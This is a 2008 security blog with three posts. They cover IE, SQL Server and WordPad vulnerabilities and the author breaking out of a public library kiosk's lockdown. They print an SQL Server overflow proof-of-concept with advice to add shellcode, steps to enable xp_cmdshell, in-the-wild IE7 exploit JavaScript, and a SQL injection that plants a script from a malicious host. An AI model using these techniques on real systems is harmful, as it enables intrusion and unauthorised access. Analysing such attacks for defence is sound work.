Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘Internet Explorer

Microsoft’s Security Hole Framework

with one comment

Since a few days, news about the Internet Explorer exploit has been sweeping the Internet (see previous post Internet Explorer 7 Attack in the Wild). It has not been confirmed that Internet Explorer 5, 6 and 7 are affected and the problem reside in the data binding of objects. Basically, the array containing objects in memory is now updated after their deletion; therefore the code stays in memory:

The vulnerability is caused by memory corruption resulting from the way Internet Explorer handles DHTML Data Bindings. This affects all currently supported versions of Internet Explorer. Malicious HTML that targets this vulnerability causes IE to create an array of data binding objects, release one of them, and later reference it. This class of vulnerability is exploitable by preparing heap memory with attacker-controlled data (“heap spray”) before the invalid pointer dereference[1].

A patch as now been issued by Microsoft[2], so update your Windows….now!

Another vulnerability that hasn’t made as much noise is the one found by SEC Consult Vulnerability Lab[3], probably because this vulnerability is in Microsoft SQL Server 2000 and 2005, which is not as widely known as Internet Explorer. Not to forget the hole found in Wordpad also[4]. This is significant though, as Microsoft now offer a complete framework for hackers to exploit a Microsoft system.

Therefore, it is now possible for an attacker to execute arbitrary code on a server using SQL server, which might be use to modify web pages to exploit the Internet Explorer vulnerability. Imagine an intranet with a web server running Windows Server 2003, a SQL Server as its database and where all clients are forced to run Internet Explorer. Now an employee with the appropriate knowledge could practically own the entire network. The hardest part would be to find the injection point. That means studying and testing the Intranet website for unsanitized input. If he can’t, just try to social engineer your way by sending a malicious WRI file to one of the administrator.

If one injection point can be found, then he could own the SQL Server using the last vulnerability discovered in SQL Server. This exploit will cause SQL Server to write memory and therefore allowing execution of arbitrary code. This is done by using the sp_replwritetovarbin stored procedure with illegal arguments. Bernhard Mueller has released a proof-of-concept script that can be used to verify if the database is vulnerable to the attack:

@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
  SET @counter = @counter + 1
  SET @buf = @buf + @val

SET @buf = @buf + ''',''1'',''1'',''1'',

EXEC master..sp_executesql @buf

This procedure will trigger an access violation if the current SQL Server is vulnerable. Then one only needs to append correctly the appropriate shellcode to the buffer “@buf” and gain new privileges. Once the database is yours, look for fields in tables that are used to make links on the web server of the intranet, and use the technique described in this previous article on how this can give you access to about every computer that connects to the webserver. Of course if the database contains sensible information such as passwords, this step might not be necessary.

You could also spawn a command shell from SQL Server by enabling the xp_cmdshell stored procedure:

EXEC master.dbo.sp_configure 'show advanced options', 1
EXEC master.dbo.sp_configure 'xp_cmdshell', 1

And then executing any command you wish with that command:


After that, the network is yours. But what if SQL Server is not installed? Apparently Wordpad is there to the rescue….or almost as this exploit only apply to Windows XP SP2, Windows 2000 and Windows Server 2003. This exploit will result in the attacker gaining the same privilege as the user that opened the malicious .wri file, therefore here is another reason not to use your computer as Administrator. According to the advisory:

When Microsoft Office Word is installed, Word 97 documents are by default opened using Microsoft Office Word, which is not affected by this vulnerability. However, an attacker could rename a malicious file to have a Windows Write (.wri) extension, which would still invoke WordPad[5].

The source of the problem comes from the Wordpad Text Converter, a component use to read Word documents even if Microsoft Word isn’t installed on the system. Not much is known about this attack. Trend Micro as an article about it and a trojan[6], identified as TROJ_MCWORDP.A[7] using this vulnerability.

This attack is triggered when the user opens a .WRI, .DOC or .RTF file, most of the time sent by e-mail. Apparently this trojan looks to see if it runs in a virtual environment (VMWare). If it is not, it drops a BKDR_AGENT.VBI file, which will open a random port on the machine it just infected, opening it to the entire world.

Schema of the Wordpad Attack (Image from Trend Micro)

Schema of the Wordpad Attack (Image from Trend Micro)

See also:

New MS SQL Server vulnerability“, Toby Kohlenberg, SANS Internet Storm Center, December 15, 2008, (accessed on December 16, 2008)

Microsoft looking into WordPad zero-day flaw“, Robert Vamosi, CNet News, December 10, 2008, (accessed on December 16, 2008)

Vulnerability Note VU#926676“, US CERT, December 11, 2008, (accessed on December 16, 2008)

[1] “Clarification on the various workarounds from the recent IE advisory”,  Microsoft, December 12, 2008, (accessed on December 16, 2008)

[2] “Microsoft Issuing Emergency Patch For Internet Explorer”, Thomas Claburn, InformationWeek, December 16, 2008, (accessed on December 16, 2008)

[3] “Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability”, Bernhard Mueller, SEC Consult Vulnerability Lab, December 4, 2008, (accessed on December 16, 2008)

[4] “Exploit for unpatched WordPad, IE flaws in the wild”, Peter Bright, Ars Technica, December 10, 2008, (accessed on December 16, 2008)

[5] “Microsoft Security Advisory (960906)”,  Microsoft Technet, December 9, 2008, (accessed on December 16, 2008)

[6] “A Word(pad) of Caution”, Roderick Ordoñez, Trend Micro, (accessed on December 16, 2008)

[7] “TROJ_MCWORDP.A”, Trend Micro, December 11, 2008, (accessed on December 16, 2008)

Fun at the Library – Part 1

with one comment

Since this is a slow news day, and I have an essay to handout tonight, I’ll just related one of my experiment I started yesterday. As I have more time, I will push further into the system.

While waiting for a friend, I decided to stop by the library to pass time. As I was there, I was immediately attracted to the nearest computer, the one away from the cameras. Some of the computers are accessible to anyone without need for user codes and passwords. These computers are there only for book searches. About everything is disabled on those computers. The only thing people have access to is an Internet Explorer 6 window giving access to the library’s website only. The window only has the Edition, Favorites and Help (“?”) menus. No address bar but the history can be accessed. There are no taskbar, Ctrl-Alt-Del and Alt-Tab are disabled, no desktop, and the Windows key doesn’t do anything. Trying to navigate to another website by following links won’t resolve. I didn’t had my warkey with me so I couldn’t test if the USB drives were working.

For certain people, i.e. the administrators of the network amongst others, this should be sufficient to prevent people from surfing porn sites and fore bringing the apocalypse on their network. Of course, it is not. First, let’s find a way to access something else. This can be easily done by using a dark and unexplored menu available in every program called the “Help” menu: Help > Index and Summary. This will open the HTML Help window. From there: Options > Internet Options.

Internet Options Accessible from the Help Menu

Internet Options Accessible from the Help Menu

Well that was simple enough right? But it’s not quite what I want. Most of the options are disabled. I can’t use the Temporary Internet Files > Parameters > Show Files/Objects to open an Explorer window. Those are disabled as well:

  • General > Accessibility > Format Documents with my Stylesheet > Browse
  • Confidentiality > Import
  • Contents > Personal Information > Profile > OK > Numerical Identificators > Import

But those are all enabled:

  • Contents > Access Manager > Activate > General > Rating Systems > Add
  • Contents > Access Manager > Activate > Advance > Import
  • Contents > Certificates > Certificates > Import > Next > Browse
  • Contents > Certificates > Editors > Import > Next > Browse

Those options all open an Open File dialog box, from which of course, I can access about everything. First action is to open a command prompt by going to C:\Windows\system\system32 and executing the command prompt program. Up to here, it works. Now we can start to spot vulnerabilities….if needed.

Damn…no time left. Next time I need to get some info about the system. I should remember to:

1) See what is the default account the administrator uses for the users:

C:>echo %userdomain%\%username%

2) : Get the version of Windows XP they are using:


3) While at it, let’s note the version of Explorer they are using and some information about the network…


I should bring my warkey also, that would make things much easier…

Sorry for the lack of depth for tonight, I know this isn’t much, hopefully this will end up in a fully example of a simple attack against a network.

Written by Jonathan Racicot

December 15, 2008 at 5:10 pm

Internet Explorer 7 Attack in the Wild

with 6 comments

Bits of information about the new 0-day exploit are surfacing on the web. This exploit provokes a heap overflow in the XML parser of Internet Explorer 7. The exploit works with the fully patched version of Windows XP, Windows Server 2008 and Windows Vista SP1[1].

The Infection

The exploit is initiated by a JavaScript file stored on infected servers across the web. The example given by the SANS Internet Storm Center is located at http://17gamo [dot] com/1.js. F-Secure also reported the URL as being infected. The content of the JavaScript file is injected through sites by a SQL injection attack and it contains a link to a web page containing the exploit and the shellcode. A complete list of infected websites can be found at Shadowserver.

The contents of the 1.js file (be careful of what you do with this info!):

document.writeln("<script src=\"http:\/\/\/click.aspx?id=484329676&logo=1\">
document.write("<iframe width=100 height=0 src=>

The SQL injection works by adding a link to every text field contained in an accessible database. Therefore, once text contained in the database is retrieved to be displayed on the webpage, the malicious link to the JavaScript is also included in it and executes the contents of the file, which contains two statements.  One is a counter to measure how many victimes it made, the other is an iFrame to the malicious webpage. The SQL injection usually takes this form, but it really depends on which software is attacked:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js>
</script>''')FETCH NEXT FROM

The Exploit

This is part of the JavaScript found in the while. It checks the version of the browser and OS and triggers the buffer overflow:


nav = navigator.userAgent.toLowerCase();

if (navigator.appVersion.indexOf(‘MSIE’) != -1) {
    version = parseFloat(navigator.appVersion.split(‘MSIE’)[1])

if (version==7) {
w2k3 = ((nav.indexOf(‘windows nt 5.2’) != -1) || (nav.indexOf(‘windows 2003’) != -1));
wxp = ((nav.indexOf(‘windows nt 5.1’) != -1) || (nav.indexOf(‘windows xp’) != -1));

    if (wxp || w2k3)
document.write(‘<XML ID=I><X>    <C><![CDATA[<image 
SRC=http://&amp;#2570;&amp;#2570;    >]]></C></X>

    var i=1;
    while (i <= 10 ) {
        window.status= “ ”; i++;

You can get a working example at

The script used in the wild waits for 6 seconds before starting, apparently to fool anti-viruses. It then verifies if the current browser is Internet Explorer and if it’s version 7. It also checks that the OS is Windows XP or 2003 (but the exploit does work in Vista also). If all conditions are met, the script will then write the malformed XML code to exploit to the parser. The loop at the end keeps the status bar from displaying any information to the user. The parsing of the XML code will trigger a heap overflow in the parser and arbitrary code can be executed.

The vulnerability is explained more in detailed by the Chinese researchers[2] that first discovered the exploit and that released the code by mistake. The original article is written in Mandarin, but a rough translation from Google leads to a mistake in the handling of pointers when “SDHTML objects” are created. A machine translated post on a forum gave that information[3]:

Recently caught using IE7 0day vulnerability code, as in dealing with the object SDHTML errors lead to memory disorders, through the structural conditions of a specific code lead to cross-border memory. 现已有人赶制出网马生成器相信会在短期内流行。 It was now working towards a network of horse generator, will be popular in the short term. 该漏洞存在于IE7XML可以导致内存越界的漏洞攻击者通过构造畸形XML代码并且使用JavaScript脚本操作ShellCode去执行任意代码。 The vulnerability exists in IE7’s XML, the memory can lead to cross-border loopholes, the attacker through the abnormal structure using JavaScript and XML code script ShellCode operation to execute arbitrary code.
漏洞描述 Description of the loopholes:
由于SDHTML里处理对象存在错误导致内存紊乱通过构造某种条件可以使得SDHTML检测到错误释放已被分配的对象但是在释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行如果这些内存又被分配给其他用途将导致SDHTML把这些内存当作一个对象来操作。 SDHTML due to errors in handling the object lead to memory disorders, through some kind of structural conditions can make mistakes SDHTML detected the release of the allocation has been the target, but the release has been the target of the distribution did not return after SDHTML be released but continue to use the object The implementation of the memory, if memory has been allocated to other purposes, such SDHTML will lead to memory as an object to the operation. 攻击者使用了XMLSRC字符串对象占用了这些释放对象的空间而对象指针里包含函数例程指针最终导致代码执行。 An attacker using the XML string SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

This hole wasn’t patch with the latest update from Microsoft. No details are available on when a hotfix will be distributed. Disabling Active Scripting will prevent this exploit from downloading the Trojan. Doing so will also protect anyone from most of the online attacks (but it will also make some sites unusable). Other solution: use Firefox or Opera. And for the geekiest, you can always use the safest browser around by downloading it here.

Observed Payload

Right now, it seems these attacks using this exploit are limited to MMORPG password stealers. The shellcode included with the current exploit will download http://www [dot] steoo [dot] com/admin/win.exe[4]. F-secure detect the trojan contained in the file as Win32.Magania and as Infostealer.Gamania[5] by Symantec. This malware is a game password stealing Trojan for games created by the Taiwanese company Gamania, creator of Maple Story amongst others.

The trojan will create various files into the %SYSTEM% directory and add himself in the registry so that it boots every time the computer starts. Files created include[6]:

  • %System%\Kerne0223.exe
  • %System%\Kerne0223.dll
  • %Windir%\SVCH0ST.EXE
  • %System%\aer4532gxa.dll (detected as Infostealer.Lineage)
  • [PATH TO TROJAN]\gg.bat
  • %System%\drivers\etc\hosts
  • c:\log.txt

And will steal every credentials entered by the user on these sites:

  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]

It is strongly believed that this Trojan origin is based in China. Various variants of this Trojan have been created. Variants may come with a keylogger and rootkits.

See also:

“Microsoft Security Advisory (961051)”, Microsoft, December 10, 2008, (accessed on December 11, 2008)

“Mass SQL Injection”, F-Secure, December 11, 2008, (accessed on December 11, 2008)

“Chinese researchers inadvertently release IE7 exploit code”, John Leyden, The Register, December 11, 2008, (accessed on December 11, 2008)

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl

[1] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, (accessed on December 11, 2008)

[2] “Alert: IE70DAY attack code has been linked to the use of  Trojan Horse”, December 12, 2008, (accessed on December 11, 2008 – Eastern Time GMT-5)

[3] Translated by Google Translate from Chinese, (accessed on December 11, 2008)

[4] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, (accessed on December 11, 2008)

[5] “Infostealer.Gamania”, Hiroshi Shinotsuka, Symantec, February 13, 2007, (accessed on December 11, 2008)

[6] Ibid.